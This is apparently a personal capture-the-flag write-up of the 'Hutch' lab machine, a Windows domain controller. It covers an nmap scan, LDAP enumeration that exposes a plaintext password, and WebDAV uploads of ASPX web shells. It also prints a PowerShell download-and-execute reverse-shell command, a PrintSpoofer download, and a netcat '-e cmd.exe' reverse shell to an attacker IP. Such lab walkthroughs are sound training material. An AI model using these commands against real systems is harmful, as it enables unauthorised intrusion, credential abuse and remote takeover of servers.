Hutch

Nmap


PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/10.0
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|   Server Date: Tue, 17 May 2022 04:05:48 GMT
|   Server Type: Microsoft-IIS/10.0
|_  WebDAV type: Unknown
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-05-17 04:05:00Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
49763/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-05-17T04:05:51
|_  start_date: N/A

Domain name retrieved 

cme smb 192.168.164.122 -u '' -p ''

SMB         192.168.164.122 445    HUTCHDC          [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB         192.168.164.122 445    HUTCHDC          [-] hutch.offsec\: STATUS_ACCESS_DENIED

list user and passwords with ldap (new) 

ldapsearch -x -h 192.168.164.122 -b "dc=hutch,dc=offsec" "*"    
 Freddy McSorley, Users, hutch.offsec
dn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Freddy McSorley
description: Password set to CrabSharkJellyfish192 at user's request. Please c
 hange on next login.

WebDav enabled and lets you upload stuff.

We can upload files with a command line cadaver with the credentials we found.

Checking which file extensions are executable with 

davtest -auth fmcsorley:CrabSharkJellyfish192 -sendbd auto -url http://192.168.164.122
/usr/bin/davtest Summary:
Created: http://192.168.164.122/DavTestDir_9TpqP6
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.jhtml
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.html
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.pl
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.jsp
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.php
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.shtml
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.aspx
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.txt
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.cgi
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.asp
PUT File: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.cfm
Executes: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.html
Executes: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.aspx
Executes: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.txt
Executes: http://192.168.164.122/DavTestDir_9TpqP6/davtest_9TpqP6.asp
PUT Shell: http://192.168.164.122/DavTestDir_9TpqP6/9TpqP6_aspx_cmd.aspx
PUT Shell: http://192.168.164.122/DavTestDir_9TpqP6/9TpqP6_asp_cmd.asp
PUT Shell: http://192.168.164.122/DavTestDir_9TpqP6/9TpqP6_aspx_cmd.aspx

Now I can execute commands!

http://192.168.164.122/DavTestDir_9TpqP6/9TpqP6_aspx_cmd.aspx

Set up a reverse tcp powershell and executed it

powershell IEX(New-Object Net.WebClient).downloadString('http://192.168.49.164/tcp_power.ps1')

Initial foothold

systeminfo

Host Name:                 HUTCHDC
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User

Since the ImpersonatePrivilege is enabled and it's 2019 Windows Server, it's not vulnerable to Potato, but is to PrintSpoofer

Transferred it to the victim. 

Powershell (New-Object Net.WebClient).DownloadFile("http://192.168.49.164/PrintSpoofer.exe","C:\Windows\Temp\PrintSpoofer.exe")

For some reason, I couldn't execute it with the shell so I transferred nc.exe and got a stable shell on linux.

PS C:\Windows\Temp> C:\Windows\Temp\nc.exe 192.168.119.153 9002 -e cmd.exe

Powershell (New-Object Net.WebClient).DownloadFile("http://192.168.49.164/nc.exe","C:\Windows\Temp\nc.exe")

Now I'm on the system!

Bloodhound experimentation

PreviousDC-1NextSunsetNoontide

Last updated